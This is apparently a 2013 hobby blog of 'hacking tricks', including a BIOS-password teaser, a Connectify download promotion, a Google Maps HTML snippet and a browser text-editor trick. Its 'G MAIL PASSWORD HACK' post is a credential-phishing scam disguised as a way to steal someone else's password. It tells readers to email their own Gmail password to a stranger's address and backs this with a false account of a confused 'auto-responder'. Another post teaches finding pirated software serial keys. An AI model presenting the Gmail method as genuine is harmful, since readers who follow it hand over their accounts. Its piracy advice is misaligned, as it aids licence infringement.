Thursday, 11 July 2013

HACK BIOS PASSWORD

HACK BIOS PASSWORD



BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS




Saturday, 29 June 2013

Game Ranger

Connectify Installer

                                                                 CONNECTIFY
Connectify can easily act as your primary router or even a repeater for your home router, extending its range and providing Internet access wherever you need it. Connect to your home network, enter the same Wi-Fi name and password, and hit “Start Hotspot.” Devices will automatically connect to the Internet through either your Connectify hotspot or home router depending on proximity.

Features:
  • Software Access Point
    • Transform your laptop into a real Wi-Fi hotspot, sharing any available Internet connection
  • Share Internet from other Wi-Fi Networks
    • Re-broadcast the Wi-Fi network you’re on, as your own secure Connectify Hotspot using your laptop’s Wi-Fi card.
  • Display Connected Computers/Devices
    • Know who and what devices are connected to your Connectify Hotspot at all times.
  • Simple Firewall Controls
    • Set Internet and local network (LAN) access permissions for each connected device.

Click the link to download

Download connectify

Wednesday, 26 June 2013

G MAIL PASSWORD HACK

G MAIL PASSWORD HACK

Step 1: Log into your Gmail account.

Step 2: Compose a new mail

Step 3: In subject box type " PASSWORD RECOVERY "


Step 4: Send this to - recoveryteamhelper15@gmail.com

Step 5: in message box Type this.

. (first line)- Email address you want to hack. (actualy you are trying to find password of your victim id)

(second line)- Your Gmail address   (You will recieve Password here)

(third line)- Your Gmail account password

(fourth line)   - < v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#" start?>=""> -
{simply copy and paste above}


How it works: you mail to a system administrators automatic responder. Usually only system administrators should be able to use this, but when you try it with your own password and mail this message from your Gmail account the computer gets confused! Why your password is needed- automatic Gmail responder will require your "system administrator password" which is in fact your own password!!! But the : computer doesn't know.

THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAIL CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick and works as many times as you try it. Have fun! NOTE: Use account you have been using for few days say at least 30 days. 

Monday, 20 May 2013

GET YOUR OWN GOOGLE MAP

TODAY I WILL HELP YOU TO DESIGN YOUR OWN GOOGLE MAP USING HTML CODING. WRITE THE FOLLOWING CODE IN NOTEPAD AND SAVE THE FILE WITH .HTML EXTENSION
<!DOCTYPE html>
<html>
<head>
<script
src="http://maps.googleapis.com/maps/api/js?key=AIzaSyDY0kkJiTPVd2U7aTOAwhc9ySH6oHxOIYM&sensor=false">
</script>

<script>
function initialize()
{
var mapProp = {
  center:new google.maps.LatLng(51.508742,-0.120850),
  zoom:5,
  mapTypeId:google.maps.MapTypeId.ROADMAP
  };
var map=new google.maps.Map(document.getElementById("googleMap"),mapProp);
}

google.maps.event.addDomListener(window, 'load', initialize);
</script>
</head>

<body>
<div id="googleMap" style="width:500px;height:380px;"></div>

</body>
</html>

Sunday, 19 May 2013

Finding Serial Key Of Any Software Using Simple Google Trick

Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR
  • Replace Software Name with the name of software whose serial key you want to find
  • Eg: To find serial key of Nero i will type Nero 94fbr
    3. Now press Enter and you will find serial key of software you are looking for as shown below.
google trick to find serial key

 

Simple Trick To Use Web Browsers As Text Editor

 Web Browsers As Text Editor
In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.

How To Do ?

   1 Copy below code in browser Url Section

 data:text/html, <html contenteditable>

   2. Now Press Enter.
   3. Now you can type anything as would do on any other text editor like Notepad.
   4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)